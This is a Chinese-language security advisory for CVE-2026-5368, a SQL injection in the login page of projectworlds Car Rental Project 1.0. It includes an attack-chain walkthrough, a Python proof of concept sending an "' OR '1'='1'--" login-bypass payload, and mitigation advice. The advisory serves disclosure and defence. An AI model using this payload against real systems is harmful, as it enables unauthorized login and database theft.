CVE-2026-5368 CVSS 7.3 高危

CVE-2026-5368 projectworlds Car Rental Project SQL注入漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5368

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

projectworlds Car Rental Project

漏洞概述

projectworlds Car Rental Project 1.0版本存在SQL注入漏洞。该漏洞位于/login.php文件的参数处理组件中。由于对用户传入的'uname'参数缺乏有效的过滤与校验，攻击者可构造恶意SQL语句。远程未经身份验证的攻击者无需用户交互即可利用此漏洞，可能导致数据库信息泄露、数据篡改或服务中断，对系统的机密性、完整性和可用性造成影响。

技术细节

该漏洞源于projectworlds Car Rental Project 1.0在处理登录请求时的设计缺陷。具体而言，在/login.php文件的参数处理组件中，接收用户名的'uname'参数直接被拼接到SQL查询语句中执行，而未经过任何预编译或转义处理。这种不安全的参数处理方式允许攻击者通过在uname字段注入特定的SQL语法（如单引号、注释符或UNION查询），从而改变原始查询逻辑。由于CVSS向量显示攻击无需认证（PR:N）且无需用户交互（UI:N），攻击者可以通过网络发送特制的HTTP POST或GET请求直接触发漏洞。成功利用后，攻击者不仅能绕过登录验证，还能提取数据库中的敏感用户数据，甚至在特定数据库配置下执行系统命令，对系统构成严重威胁。

攻击链分析

STEP 1

1. 侦察

攻击者扫描目标服务器，识别出运行中的projectworlds Car Rental Project系统，并定位到/login.php登录入口。

STEP 2

2. 武器化

攻击者构造针对'uname'参数的恶意SQL注入Payload，例如使用逻辑绕过语句 `' OR '1'='1`。

STEP 3

3. 投递

攻击者通过网络向受害者的/login.php接口发送包含恶意Payload的HTTP POST请求。

STEP 4

4. 利用

服务器端后端脚本接收到Payload，直接将其拼接到SQL查询中并执行数据库查询，导致SQL语句逻辑被改变。

STEP 5

5. 达成目标

攻击者成功绕过身份验证或获取敏感数据库信息，实现了对系统机密性、完整性或可用性的破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (replace with actual target)
target_url = "http://target-ip/login.php"

# SQL Injection Payload for 'uname' parameter
# Attempting to bypass login using ' OR '1'='1
payload = {
    "uname": "' OR '1'='1'--",
    "password": "anything"
}

try:
    response = requests.post(target_url, data=payload)
    # Check for successful login indicators (adjust based on application response)
    if "Welcome" in response.text or response.status_code == 200:
        print("[+] Vulnerability exploited successfully! Potential login bypass.")
    else:
        print("[-] Exploit failed or target not vulnerable.")
except Exception as e:
    print(f"Error: {e}")

影响范围

projectworlds Car Rental Project 1.0

防御指南

临时缓解措施

在无法立即升级或修复代码的情况下，建议在Web应用防火墙（WAF）中部署规则，拦截包含常见SQL注入特征（如单引号、OR、UNION、注释符等）的请求。同时，严格限制对/login.php接口的访问频率，并监控异常的登录尝试行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5368
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5368
3 Details https://www.cvedetails.com/cve/CVE-2026-5368/
4 VulDB https://vuldb.com/cve/CVE-2026-5368
5 Link https://github.com/eqiya17/collection-of-vulnerabilities/issues/5
6 Link https://vuldb.com/submit/781665
7 Link https://vuldb.com/vuln/354746
8 Link https://vuldb.com/vuln/354746/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表